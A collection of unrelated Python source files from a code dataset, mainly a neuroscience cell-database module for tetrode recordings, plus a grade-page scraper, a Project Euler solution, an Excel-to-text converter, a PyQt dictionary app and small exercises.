decisions:\n\n- Experiment should add sessions directly to the last site in the list of sites.\n This avoids needing to return a handle to each site during an experiment.\n The experimenter can instead just return handles to each experiment object.\n Pros:\n - No need to return a handle to every site (it gets confusing quickly)\n Cons:\n - Sessions are always added to the last site that was created - the experimenter does not choose the site to add a session to (could be misleading?)\n\n- 'tetrodes' should not be specified when creating individual sites\n Everyone clusters all tetrodes anyway\n (Nick originally included the 'tetrodes' argument to specify which tetrodes had good signals at a specific site,\n but even he just clusters everything now).\n\n Alternatives for the 'tetrodes' variable:\n * Specify it at the experiment level\n Pros:\n - Having 'tetrodes' as an attribute is really convenient to iterate over when clustering.\n Cons:\n - The numbers rarely change and can be determined from the data (the names of the .spikes files)\n - Sometimes we use single electrodes (very rarely) and might possibly use stereotrodes or\n silicon probes with a linear array of recording sites - neither would be added to openEphys GUI as\n a '\nTetrode' and the .spikes file would show up as something like 'SingleElectrode1.spikes' or\n 'Stereotrode1.spikes'. Having an argument for 'tetrode' may not always be applicable to all experiments\n\n * Do not specify it at all\n Pros:\n - More flexibility (applicable to experiments where we are not recording with tetrodes)\n Cons:\n - When clustering, we will need to read the ephys session files to find out which tetrodes were collected\n\n * Specify both an electrode name and a range of values ('Tetrode', [1, 2, 3, 4])\n Pros:\n - Applicable to other recording setups (e.g. 'SingleElectrode', range(1, 33) for 32 single electrode recording sites on a linear array)\n Cons:\n - More variables to store, and we don't use other kinds of recording setups now.\n * Have a dict of metadata entries store the tetrode numbers\n Something like:\n experiment.metadata={'electrodeName': 'Tetrode',\n 'electrodeNums': [1, 2, 3, 4, 5, 6, 7, 8],\n 'location': 'cortex'}\n Pros:\n - Flexible, can add any metadata that you want about the experiment and can have a set of defaults per animal\n Cons:\n - Need to have the right key names to be able to use the values in scripts later\n\n* Should sessions convert the and date into the ephys session folder and store that?\n Also convert the behav suffix and paradigm into the behav filename?\n\n Pros:\n The relevant information for clustering and plotting reports will be easy to add\n to a pandas dataframe because we can do vars(session) and this returns a dict,\n which we can add to a pandas dataframe directly. Later, we can simply use this\n column instead of having to get multiple columns and create the correct\n Cons:\n This is redundant if we are also storing the date, timestamp, paradigm, etc.\n\n---\n\nclass InfoRecording(object):\n InfoRecordings is a container of experiments.\n One per subject\n Attributes:\n subject (str): The name of the subject\n experiments (list): A list of all the experiments conducted with this subject\n Methods:\n add_experiment: Add a new experiment for this subject\n\n\n\n'''\n\n\n\nclass Experiment(object):\n '''\n Experiment is a container of sites.\n One per day.\n Attributes:\n subject(str): Name of the subject\n date (str): The date the experiment was conducted\n brainarea (str): The area of the brain where the recording was conducted\n sites (list): A list of all recording sites for this experiment\n info (str): Extra info about the experiment\n tetrodes (list): Default tetrodes for this experiment\n TODO: Fail gracefully if the experimenter tries to add sessions without adding a site first\n TODO: Should the info attr be a dictionary?\n '''\n def __init__(self, subject, date, brainarea, info=''):\n self.subject=subject\n self.date=date\n self.brainarea=brainarea\n self.info=info\n self.sites=[]\n self.tetrodes = [1,2,3,4,5,6,7,8]\n self.maxDepth = None\n self.shankEnds = None\n # self.probeGeometryFile = '/tmp/A4x2tet_5mm_150_200_121.py' #TODO: Implement something for probe geometry long-term storage?\n def add_site(self, depth, date=None, tetrodes=None):\n '''\n Append a new Site object to the list of sites.\n Args:\n depth (int): The depth of the tip of the electrode array for this site\n date (str): The date of recording for this site\n tetrodes (list): Tetrodes to analyze for this site\n Returns:\n site (celldatabase.Site object): Handle to site object\n '''\n if date is None:\n date = self.date\n if tetrodes is None:\n tetrodes = self.tetrodes\n site=Site(self.subject, date, self.brainarea, self.info, depth, tetrodes)\n self.sites.append(site)\n return site\n def add_session(self, timestamp, behavsuffix, sessiontype, paradigm, date=None):\n '''\n Add a new Session object to the list of sessions belonging to the most recent Site\n Args:\n timestamp (str): The timestamp used by openEphys GUI to name the session\n behavsuffix (str): The suffix of the behavior file\n sessiontype (str): A string describing what kind of session this is.\n paradigm (str): The name of the paradigm used to collect the session\n date (str): The recording date. Only needed if the date of the session is different\n from the date of the Experiment/Site (if you record past midnight)\n '''\n try:\n activeSite = self.sites[-1] #Use the most recent site for this experiment\n except IndexError:\n raise IndexError('There are no sites to add sessions to')\n session = activeSite.add_session(timestamp,\n behavsuffix,\n sessiontype,\n paradigm,\n date)\n return session\n def pretty_print(self, sites=True, sessions=False):\n '''\n Print a string with date, brainarea, and optional list of sites/sessions by index\n Args:\n sites (bool): Whether to list all sites in the experiment by index\n sessions (bool): Whether to list all sessions in each site by index\n Returns:\n message (str): A formatted string with the message to print\n '''\n message = []\n message.append('Experiment on {} in {}\\n'.format(self.date, self.brainarea))\n if sites:\n for indSite, site in enumerate(self.sites):\n #Append the ouput of the pretty_print() func for each site\n message.append(' [{}]: {}'.format(indSite,\n site.pretty_print(sessions=sessions)))\n return ''.join(message)\n def site_comment(self, message):\n '''\n Add a comment string to the list of comments for the most recent Site.\n This method allows commenting on Site objects without returning handles to them.\n Args:\n message (str): The message string to append to the list of comments for the Site\n '''\n activeSite = self.sites[-1] #Use the most recent site for this experiment\n activeSite.comment(message)\n def session_comment(self, message):\n '''\n Add a comment string to the list of comments for the most recent Session.\n This method allows commenting on Session objects without returning handles to them.\n Args:\n message (str): The message string to append to the list of comments for the Session\n '''\n activeSite = self.sites[-1] #Use the most recent Site for this Experiment\n activeSession = activeSite.sessions[-1] #Use the most recent Session for this Site\n activeSession.comment(message)\n\nclass Site(object):\n '''\n Site is a container of sessions.\n One per group of sessions which contain the same neurons and should be clustered together\n Attributes:\n subject(str): Name of the subject\n date (str): The date the experiment was conducted\n brainarea (str): The area of the brain where the recording was conducted\n info (str): Extra info about the experiment\n depth (int): The depth in microns at which the sessions were recorded\n tetrodes (list): Tetrodes for this site\n sessions (list): A list of all the sessions recorded at this site\n comments (list of str): Comments for this site\n clusterFolder (str): The folder where clustering info will be saved for this site\n '''\n def __init__(self, subject, date, brainarea, info, depth, tetrodes):\n self.subject=subject\n self.date=date\n self.brainarea=brainarea\n self.info=info\n self.depth=depth\n self.tetrodes = tetrodes\n self.sessions=[]\n self.comments=[]\n self.clusterFolder = 'multisession_{}_{}um'.format(self.date, self.depth)\n def remove_tetrodes(self, tetrodesToRemove):\n '''\n Remove tetrodes from a site's list of tetrodes\n '''\n if not isinstance(tetrodesToRemove, list):\n tetrodesToRemove = [tetrodesToRemove]\n for tetrode in tetrodesToRemove:\n self.tetrodes.remove(tetrode)\n def add_session(self, timestamp, behavsuffix, sessiontype, paradigm, date=None):\n '''\n Add a session to the list of sessions.\n Args:\n timestamp (str): The timestamp used by openEphys GUI to name the session\n behavsuffix (str): The suffix of the behavior file\n sessiontype (str): A string describing what kind of session this is.\n paradigm (str): The name of the paradigm used to collect the session\n date (str): The recording date. Only needed if the date of the session is different\n from the date of the Experiment/Site (if you record past midnight)\n '''\n if date is None:\n date=self.date\n session = Session(self.subject,\n date,\n self.brainarea,\n self.info,\n self.depth,\n self.tetrodes,\n timestamp,\n behavsuffix,\n sessiontype,\n paradigm)\n self.sessions.append(session)\n return session\n def session_ephys_dirs(self):\n '''\n Returns a list of the ephys directories for all sessions recorded at this site.\n Returns:\n dirs (list): List of ephys directories for each session in self.sessions\n '''\n dirs = [session.ephys_dir() for session in self.sessions]\n return dirs\n # def session_behav_filenames(self):\n # '''\n # Returns a list of the behavior filenames for all sessions recorded at this site.\n # Returns:\n # fns (list): list of behavior filenames for each session in self.sessions\n # DEPRECATED (2017-10-30): session function no longer implemented\n # '''\n # fns = [session.behav_filename() for session in self.sessions]\n # return fns\n def session_types(self):\n '''\n Returns a list of the session type strings for all sessions recorded at this site.\n Returns:\n types (list): List of the sessiontype strings for each session in self.sessions\n DEPRECATED (2017-10-30): We just have the generator in the cluster_info method to be clear\n about what is returned per session and what is a site attr.\n '''\n types=[session.sessiontype for session in self.sessions]\n return types\n # def find_session(self, sessiontype):\n # '''\n # Return indexes of sessions of type sessiontype.\n # Args:\n # sessiontype (str): The sessiontype string to search for.\n # Returns:\n # inds (list): List of indices of sessions of type sessiontype.\n # '''\n # inds = [i for i, st in enumerate(self.session_types()) if st==sessiontype]\n # return inds\n def cluster_info(self):\n '''\n Returns a dictionary with the information needed to identify clusters that come from this site.\n Returns:\n infoDict (dict): dictionary containing info defining clusters that come from this site\n '''\n infoDict = {\n 'subject':self.subject,\n 'date':self.date,\n 'brainArea': self.brainarea,\n 'info': self.info,\n 'depth':self.depth,\n 'ephysTime':[session.timestamp for session in self.sessions],\n 'paradigm':[session.paradigm for session in self.sessions],\n 'behavSuffix':[session.behavsuffix for session in self.sessions],\n 'sessionType':[session.sessiontype for session in self.sessions]\n }\n return infoDict\n\n def pretty_print(self, sessions=False):\n '''\n Print a string with depth, number of sessions, and optional list of sessions by index\n Args:\n sessions (bool): Whether to list all sessions by index\n Returns:\n message (str): A formatted string with the message to print\n '''\n message=[]\n message.append('Site at {}um with {} sessions\\n'.format(self.depth, len(self.sessions)))\n if sessions:\n for session in self.sessions:\n message.append(' {}\\n'.format(session.pretty_print()))\n return ''.join(message)\n def comment(self, message):\n '''\n Add a comment to self.comments\n Args:\n message (str): The message string to append to self.comments\n '''\n self.comments.append(message)\n\nclass Session(object):\n '''\n Session is a single recorded ephys file and the associated behavior file.\n Attributes:\n subject(str): Name of the subject\n date (str): The date the experiment was conducted\n depth (int): The depth in microns at which the sessions were recorded\n timestamp (str): The timestamp used by openEphys GUI to name the session\n behavsuffix (str): The suffix of the behavior file\n sessiontype (str): A string describing what kind of session this is.\n paradigm (str): The name of the paradigm used to collect the session\n comments (list): list of strings, comments about the session\n '''\n def __init__(self, subject, date, brainarea, info, depth, tetrodes, timestamp, behavsuffix, sessiontype, paradigm, comments=[]):\n self.subject = subject\n self.date = date\n self.depth = depth\n self.tetrodes = tetrodes\n self.timestamp = timestamp\n self.behavsuffix = behavsuffix\n self.sessiontype = sessiontype\n self.paradigm = paradigm\n self.comments = comments\n def ephys_dir(self):\n '''\n Join the date and the session timestamp to generate the actual directory used store the ephys data\n Returns:\n path (str): The full folder name used by OpenEphys to save the ephys data\n DEPRECATED (2017-10-30): We are going to return just the timestamp, not with the date attached\n '''\n path = os.path.join('{}_{}'.format(self.date, self.timestamp))\n return path\n # def behav_filename(self):\n # '''\n # Generate the behavior filename from session attributes and the beahvior suffix.\n # Returns:\n # fn (str): The full behavior filename\n # DEPRECATED (2017-10-30) We are going to return the suffix and paradigm, not the full path for each session\n # '''\n # fn=None\n # if self.behavsuffix:\n # bdate = ''.join(self.date.split('-'))\n # fn = '{}_{}_{}{}.h5'.format(self.subject,\n # self.paradigm,\n # bdate,\n # self.behavsuffix)\n # return fn\n def pretty_print(self):\n '''\n Print a string containing the timestamp and sessiontype string\n '''\n return \"{}: {}\".format(self.timestamp, self.sessiontype)\n def __str__(self):\n '''\n Use self.pretty_print() if someone tries to print a session\n '''\n return self.pretty_print()\n def comment(self, message):\n '''\n Add a message to the list of comments\n Args:\n message (str): The message string to append\n '''\n self.comments.append(message)\n\n#Use the pandas dataframe functions directly\n# def save_dataframe_as_HDF5(path, dataframe):\n# '''\n# Saves a dataframe to HDF5 format.\n\n# Args:\n# path (str): /path/to/file.h5\n# dataframe (pandas.DataFrame): dataframe object\n# '''\n# dataframe.to_hdf(path, 'dataframe')\n\n# def load_dataframe_from_HDF5(path, **kwargs):\n# '''\n# See pandas.read_hdf docs for useful kwargs (loading only certain rows, cols, etc)\n# Args:\n# path (str): /path/to/file.h5\n# '''\n# dataframe = pd.read_hdf(path, key='dataframe', **kwargs)\n# return dataframe\n\ndef generate_cell_database(inforecPath):\n '''\n Iterates over all sites in an inforec and builds a cell database. This function requires that the data is already clustered.\n Args:\n inforecPath (str): absolute path to the inforec file\n Returns:\n db (pandas.DataFrame): the cell database\n '''\n\n #clusterDirFormat = 'multisession_exp{}site{}'\n tetrodeStatsFormat = 'Tetrode{}_stats.npz'\n #inforec = imp.load_source('module.name', inforecPath) # 'module.name' was meant to be an actual name\n inforec = imp.load_source('inforec_module', inforecPath)\n print('\\n# -- Generating database for new inforec file -- #\\n')\n db = pd.DataFrame(dtype=object)\n for indExperiment, experiment in enumerate(inforec.experiments):\n #Complain if the maxDepth attr is not set for this experiment\n if experiment.maxDepth is None:\n print(\"Attribute maxDepth not set for experiment with subject {} on {}\".format(experiment.subject, experiment.date))\n # maxDepthThisExp = None\n raise AttributeError('You must set maxDepth for each experiment.')\n else:\n maxDepthThisExp = experiment.maxDepth\n print('Adding experiment from {} on {}'.format(experiment.subject, experiment.date))\n for indSite, site in enumerate(experiment.sites):\n #clusterDir = clusterDirFormat.format(indExperiment, indSite)\n clusterFolder = site.clusterFolder\n for tetrode in site.tetrodes:\n clusterStatsFn = tetrodeStatsFormat.format(tetrode)\n clusterStatsFullPath = os.path.join(settings.EPHYS_PATH,\n inforec.subject,\n clusterFolder,\n clusterStatsFn)\n if not os.path.isfile(clusterStatsFullPath):\n raise NotClusteredYetError(\"Experiment {} Site {} Tetrode {} is not clustered.\\nNo file {}\".format(indExperiment, indSite, tetrode,clusterStatsFullPath))\n clusterStats = np.load(clusterStatsFullPath)\n\n for indc, cluster in enumerate(clusterStats['clusters']):\n #Calculate cluster shape quality\n clusterPeakAmps = clusterStats['clusterPeakAmplitudes'][indc]\n clusterSpikeSD = clusterStats['clusterSpikeSD'][indc]\n clusterShapeQuality = abs(clusterPeakAmps[1]/clusterSpikeSD.mean())\n clusterDict = {'maxDepth':maxDepthThisExp,\n 'tetrode':tetrode,\n 'cluster':cluster,\n 'nSpikes':clusterStats['nSpikes'][indc],\n 'isiViolations':clusterStats['isiViolations'][indc],\n 'spikeShape':clusterStats['clusterSpikeShape'][indc],\n 'spikeShapeSD':clusterSpikeSD,\n 'spikePeakAmplitudes':clusterPeakAmps,\n 'spikePeakTimes':clusterStats['clusterPeakTimes'][indc],\n 'spikeShapeQuality':clusterShapeQuality}\n clusterDict.update(site.cluster_info())\n db = db.append(clusterDict, ignore_index=True)\n #NOTE: This is an ugly way to force these columns to be int. Will fix in future if possible\n db['tetrode'] = db['tetrode'].astype(int)\n db['cluster'] = db['cluster'].astype(int)\n db['nSpikes'] = db['nSpikes'].astype(int)\n return db\n\ndef find_cell(database, subject, date, depth, tetrode, cluster):\n cell = database.query('subject==@subject and date==@date and depth==@depth and tetrode==@tetrode and cluster==@cluster')\n if len(cell)>1:\n raise AssertionError('This information somehow defines more than 1 cell in the database.')\n elif len(cell)==0:\n raise AssertionError('No cells fit this search criteria.')\n elif len(cell)==1:\n return cell.index[0], cell.iloc[0] #Return the index and the series: once you convert to series the index is lost\n\ndef get_cell_info(database, index):\n '''\n The index is THE index from the original pandas dataframe. It is not the positional index.\n '''\n cell = database.loc[index]\n cellDict = {'subject':cell['subject'],\n 'date':cell['date'],\n 'depth':cell['depth'],\n 'tetrode':cell['tetrode'],\n 'cluster':cell['cluster']}\n return cellDict\n\ndef save_hdf(dframe, filename):\n '''\n Save database as HDF5, in a cleaner format than pandas.DataFrame.to_hdf()\n Use celldatabase.load_hdf() to load these files.\n\n Args:\n dframe: pandas dataframe containing database.\n filename: full path to output file.\n\n TODO: save index\n '''\n h5file = h5py.File(filename,'w')\n string_dt = h5py.special_dtype(vlen=str)\n # try:\n if 1:\n dbGroup = h5file.require_group('/') # database\n for onecol in dframe.columns:\n onevalue = dframe.iloc[0][onecol]\n if isinstance(onevalue, np.ndarray):\n arraydata = np.vstack(dframe[onecol].values)\n dset = dbGroup.create_dataset(onecol, data=arraydata)\n elif isinstance(onevalue, int) or \\\n isinstance(onevalue, float) or \\\n isinstance(onevalue, bool) or \\\n isinstance(onevalue, np.bool_):\n arraydata=dframe[onecol].values\n dset = dbGroup.create_dataset(onecol, data=arraydata)\n elif isinstance(onevalue, str):\n arraydata = dframe[onecol].values.astype(str)\n dset = dbGroup.create_dataset(onecol, data=arraydata)\n elif isinstance(onevalue, list):\n # For columns like: behavSuffix, ephysTime, paradigm, sessionType\n arraydata = dframe[onecol].values\n dset = dbGroup.create_dataset(onecol, data=arraydata, dtype=string_dt)\n else:\n raise ValueError('Trying to save items of invalid type')\n #dset.attrs['Description'] = onecol\n h5file.close()\n # except:\n # h5file.close()\n # # TODO: We may want to rename the incomplete h5 file\n # raise\n\ndef load_hdf(filename, root='/'):\n '''\n Load database into a pandas dataframe from an HDF5 file\n saved by celldatabase.save_hdf()\n\n Args:\n filename: full path to HDF5 file.\n root: the HDF5 group containing the database.\n '''\n dbDict = {}\n try:\n h5file = h5py.File(filename,'r')\n except IOError:\n print('{0} does not exist or cannot be opened.'.format(filename))\n raise\n for varname,varvalue in list(h5file[root].items()):\n if varvalue.dtype==np.int or varvalue.dtype==np.float:\n if len(varvalue.shape)==1:\n dbDict[varname] = varvalue[...]\n else:\n dbDict[varname] = list(varvalue[...]) # If it is an array\n if varvalue.dtype.kind=='S':\n dbDict[varname] = varvalue[...]\n if varvalue.dtype==np.object:\n dataAsList = [ast.literal_eval(v) for v in varvalue]\n dbDict[varname] = dataAsList\n h5file.close()\n return pd.DataFrame(dbDict)\n\n\n\nclass NotClusteredYetError(Exception):\n pass\n\n# def find_cell(db, subject, date, depth, tetrode, cluster):\n# cell = db.query('subject==@subject and date==@date and depth==@depth\\\n# and tetrode==@tetrode and cluster==@cluster')\n# if len(result)!=1:\n# #Does not exist or not unique\n# raise\n# return cell[0]\n\n'''\nimport h5py\nh5file = h5py.File('/tmp/test.h5','w')\ndbGroup = h5file.require_group('/')\n\ndset = dbGroup.create_dataset('mykey', data=x)\nh5file.close()\n'''\n","sub_path":"celldatabase.py","file_name":"celldatabase.py","file_ext":"py","file_size_in_byte":33141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"118415452","text":"from multiprocessing.dummy import Pool\nfrom urllib.parse import parse_qs, urlparse\n\nfrom scraper.webvpn_browser import WebvpnBrowser\nfrom scraper.group_page import SubjectsList\nfrom scraper.group_disciplines import DisciplineTutor\nfrom scraper.progress import ProgressList\nfrom scraper.students_list import StudentsList\nfrom scraper.save_in_json import JsonSave\n\n\ndef save_progress_pages(arg):\n vpn, urls = arg\n global COUNT\n for url in urls:\n COUNT += 1\n \n print(str(COUNT) + ', Ошибок: ' + str(len(errors)) + '\\n', end='')\n data = parse_progress_page(vpn, url)\n if data:\n if data['progress']:\n progress_j.push(data['progress'])\n if data['disciplines']:\n disciplines_j.push(data['disciplines'])\n if data['students']:\n students_j.push(data['students'])\n\n\ndef parse_progress_page(vpn, url):\n try:\n group_id = parse_qs(urlparse(url).query)['gid'][0]\n page = vpn.get_marks_page(url)\n sbjlist = SubjectsList(page)\n group = sbjlist.group\n print(group['name'])\n links = sbjlist.get_links_list()\n del sbjlist\n\n students_list = StudentsList(page, group_id)\n students_data = students_list.get_students()\n \n progress_data = {'group':group, 'disciplines':[]}\n disciplines = {}\n students = []\n for link in links:\n discipline_page = vpn.get_discipline_progress(link['url'])\n disc_id = parse_qs(urlparse(link['url']).query)['dis'][0]\n tutor = DisciplineTutor(discipline_page)\n if link['name'] in disciplines:\n disciplines[link['name']]['types'].append({'type': link['type'], 'tutors': tutor.get_tutors()})\n else:\n disciplines[link['name']] = {'name':link['name'], 'department': link['department'], 'id': disc_id,\n 'types':[{'type': link['type'], 'tutors': tutor.get_tutors()}]}\n\n progress = ProgressList(discipline_page, link['name'], link['type'])\n if not students:\n students = progress.parse_names()\n progress.names = students\n progress_data['disciplines'].append(progress.parse())\n\n disciplines_data = {'name': group['name'], 'id': group_id, 'disciplines': [i for i in disciplines.values()]}\n \n return {'progress': progress_data, 'disciplines': disciplines_data, 'students': students_data}\n except Exception as e:\n errors.append([url, e])\n f = open(disciplines_j.errors_dir + '/group_disciplines_first_{}_errors.txt'.format(len(errors)), 'w')\n f.write('\\n'.join([str(i[1]) + ' ' + i[0] for i in errors]))\n f.close()\n\n\nauths_num = WebvpnBrowser.auths()\n\n\n\nCOUNT = 0\ndisciplines_j = JsonSave('disciplines', 'groups')\nprogress_j = JsonSave('progress', 'groups')\nstudents_j = JsonSave('students', 'groups')\n\nerrors = []\n\nurls = WebvpnBrowser(1).get_marks_pages_list()\n\npages_num = len(urls)\npages_per_worker = pages_num // auths_num\nprint('Всего используется аккаунтов:', auths_num)\nprint('Групп на один аккаунт (приблизительно):', pages_per_worker)\npool = Pool(auths_num)\nworkers = []\nworker_pages_range = [0, pages_per_worker]\nfor i in range(1, auths_num+1):\n workers.append((WebvpnBrowser(i), urls[worker_pages_range[0]:worker_pages_range[1]]))\n worker_pages_range = [worker_pages_range[1], worker_pages_range[1]*2]\n\nresults = pool.map(save_progress_pages, workers)\npool.close()\npool.join()\n\n\nif len(errors):\n print('Возникли ошибки на', len(errors), 'страницах')\n f = open(disciplines_j.errors_dir + '/groups_discipline_errors.txt', 'w')\n f.write('\\n'.join([str(i[1]) + ' ' + i[0] for i in errors]))\n f.close()\n\n error_urls = [i[0] for i in errors]\n print('Пробуем распарсить страницы с ошибками еще раз')\n errors = []\n save_progress_pages([WebvpnBrowser(1), error_urls])\n print('В результате: {} ошибок'.format(len(errors)))\n\n\ndisciplines_j.commit()\nprogress_j.commit()\nstudents_j.commit()\n","sub_path":"run_group_disciplines.py","file_name":"run_group_disciplines.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"318836248","text":"#!/usr/bin/python\n# Filename: pr52.py\n\"\"\"It can be seen that the number, 125874, and its double, 251748, contain exactly the same digits, but in a different order.\n\nFind the smallest positive integer, x, such that 2x, 3x, 4x, 5x, and 6x, contain the same digits.\"\"\"\n\nPERM_COUNT = 6\ndef is_perm(_val0):\n \"\"\"returns TRUE if multiples of _val0, up to PERM_COUNT, are permutations of _val0, FALSE otherwise\"\"\"\n sortedval0 = sorted(str(_val0))\n for i in range(2, PERM_COUNT+1):\n if sortedval0!=sorted(str(_val0*i)):\n return False\n return True\n\nif __name__==\"__main__\":\n # setup\n digit_count = 1\n while True:\n for i in range(10**(digit_count-1), 10**digit_count//PERM_COUNT):\n if(is_perm(i)):\n print(i)\n quit()\n\n digit_count+=1\n","sub_path":"pr52.py","file_name":"pr52.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"258233652","text":"# coding='gbk'\n'''\nfunction:将excel文件转换为text\nauthor:Nstock\ndate:2018/3/1\n'''\nimport pandas as pd\nimport re\nimport codecs\n\n\n# 将excel转化为txt文件\ndef exceltotxt(excel_dir, txt_dir):\n with codecs.open(txt_dir, 'w', 'utf-8') as f:\n neg = pd.read_excel(excel_dir, header=None, index=None)\n f.write(neg.to_string())\n\n\n# 去除记录行首的数字和空格\ndef del_linehead_number_speace(orig_txt_dir, saveas_txt_dir):\n with open(orig_txt_dir, 'r+',encoding='UTF-8') as f, open(saveas_txt_dir, 'r+',encoding='UTF-8') as fw:\n lines = f.readlines()\n print(len(lines)) # 行数\n texts = [re.sub(r'(\\d)+(\\s)+', '', lines[num]) for num in range(len(lines))]\n\n texts = list(set(texts)) # 去重如果要保留重复记录注释该行\n\n line_num = len(texts)\n # for num in range(line_num): #查看转化后的文本\n # print(texts[num])\n fw.writelines(texts)\n\n\nexceltotxt('./123.xlsx', './neg_temp.txt')\ndel_linehead_number_speace('./neg_temp.txt', './neg.txt')","sub_path":"python/third_library/excel2txt/excel2txt.py","file_name":"excel2txt.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"197938133","text":"#!/usr/bin/env python\n#coding:utf-8\n\"\"\"\n Author: G.K.\n Purpose: \n Created: 2016/3/3\n\"\"\"\n\nimport sys\nfrom PyQt4 import QtGui\nfrom PyQt4 import QtCore\nfrom dictionary import translate\nimport urllib2\nimport ctypes\n# compiler\nimport FixTk\n\nicon = \"dict.ico\"\ndef center(w):\n qr = w.frameGeometry()\n cp = QtGui.QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp)\n w.move(qr.topLeft())\n \ndef main():\n app = QtGui.QApplication(sys.argv)\n \n w = QtGui.QWidget()\n w.resize(500, 309) # 0.618\n #w.move(300, 300)\n center(w)\n w.setWindowTitle('Clean Dictionary')\n \n textbox = QtGui.QLineEdit(w)\n btn = QtGui.QPushButton(\"Query\")\n \n hbox = QtGui.QHBoxLayout()\n hbox.addWidget(textbox)\n hbox.addWidget(btn)\n \n logOutput = QtGui.QTextEdit(w)\n logOutput.setReadOnly(True)\n logOutput.setLineWrapMode(QtGui.QTextEdit.NoWrap)\n \n font = logOutput.font()\n font.setFamily(\"Consolas\") # Courier Consolas\n font.setPointSize(12) \n \n logOutput.setCurrentFont(font) \n textbox.setFont(font)\n p = logOutput.palette()\n p.setColor(QtGui.QPalette.Base, QtGui.QColor(255,255,255))\n logOutput.setPalette(p)\n \n\n vbox = QtGui.QVBoxLayout()\n vbox.addLayout(hbox)\n vbox.addWidget(logOutput)\n \n w.setLayout(vbox)\n \n def on_clicked():\n query = textbox.text()\n if query.isEmpty():\n return\n query = unicode(query).encode('utf8')\n out = translate(query)\n logOutput.setPlainText(out)\n \n btn.clicked.connect(on_clicked)\n textbox.returnPressed.connect(on_clicked)\n w.show()\n try:\n app.setWindowIcon(QtGui.QIcon(icon))\n w.setWindowIcon(QtGui.QIcon(icon))\n except:\n pass\n sys.exit(app.exec_())\n \nif __name__ == '__main__':\n myappid = u'mycompany.myproduct.subproduct.version' # arbitrary string\n ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid) \n main()\n","sub_path":"ui.pyw","file_name":"ui.pyw","file_ext":"pyw","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"525694449","text":"#Name: Shany Perez\n#Email: shany.perez67@myhunter.cuny.edu\n#Date: Aug 27, 2019\n#This program will encript the inputed message by shifting the ASCII value of each character by 13\n\nuserInput = input()\t#input let the users enter data into the console\nencripted = \"\"\n\nfor i in userInput:\t\t#Runs for each character int he userInput variable\n\tcode = ord(i) - 13\t#Shift the unicode of the character to the right by 13\n\tif code < ord('a'):\t#Check if the shifter value of the character is lower than the unicode value of the character 'a'\n\t\td = (ord('a') - 1) - (code)\t\t#Substract the value of the shifted character from the value of the character before 'a'\n\t\tn = ord('z') - d\t\t\t\t#Substract the value of the difference from the value of 'z'\n\t\tencripted += chr(n)\t\t\t\t#Add the new character to the string 'encripted'\n\telse :\n\t\tencripted += chr(code)\t\t\t#Add the new character to the string\nprint(encripted)","sub_path":"9.EncriptedMessage/EncriptedMessage.py","file_name":"EncriptedMessage.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"549193095","text":"lista = [50,50,30,5,1]\n#print(lista)\n\nlista [1]=52\nmaximo = max(lista)\nminimo = min(lista)\nsumalista = sum(lista)\n\n#print (lista)\n#print(maximo, \" \", minimo,\" \",sumalista)\n\nmatriz = [[0,0,0],[0,0,0],[0,0,0]]\nfor i in matriz:\n print(i)\n\nlisma = [0,0,0]\nmatriz2 = [lista]*3\nprint(matriz2)\nprint()\n\ntamañoMatriz = len(matriz2)\n#print(tamañoMatriz)\n\n##########################################\n\nnumero_filas = 2\nnumero_columnas = 3\n\nmatrix =[]\nfor i in range(numero_filas):\n matrix.append([None])\n for j in range(numero_columnas):\n matrix[i].append(None)\nprint(\"Manera 1\")\nprint(matrix)\nprint()\nprint(\"Manera 2\")\nmatrix10 = [0]*numero_filas\nfor i in range(numero_filas):\n matrix10[1]=[0]*numero_columnas\n\nfor m in matrix10:\n print(m)","sub_path":"Buscaminas.py","file_name":"Buscaminas.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"488857678","text":"#////////////////////////////////////////////////////////////////////////////////////\n#// Authors: Kwangsoo Han and Jiajia Li\n#// (Ph.D. advisor: Andrew B. Kahng),\n#// Many subsequent changes for open-sourcing were made by Mateus Fogaça\n#// (Ph.D. advisor: Ricardo Reis)\n#//\n#// BSD 3-Clause License\n#//\n#// Copyright (c) 2018, The Regents of the University of California\n#// All rights reserved.\n#//\n#// Redistribution and use in source and binary forms, with or without\n#// modification, are permitted provided that the following conditions are met:\n#//\n#// * Redistributions of source code must retain the above copyright notice, this\n#// list of conditions and the following disclaimer.\n#//\n#// * Redistributions in binary form must reproduce the above copyright notice,\n#// this list of conditions and the following disclaimer in the documentation\n#// and/or other materials provided with the distribution.\n#//\n#// * Neither the name of the copyright holder nor the names of its\n#// contributors may be used to endorse or promote products derived from\n#// this software without specific prior written permission.\n#//\n#// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n#// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n#// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n#// DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n#// FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n#// DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n#// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n#// CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n#// OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n#// OF THIS 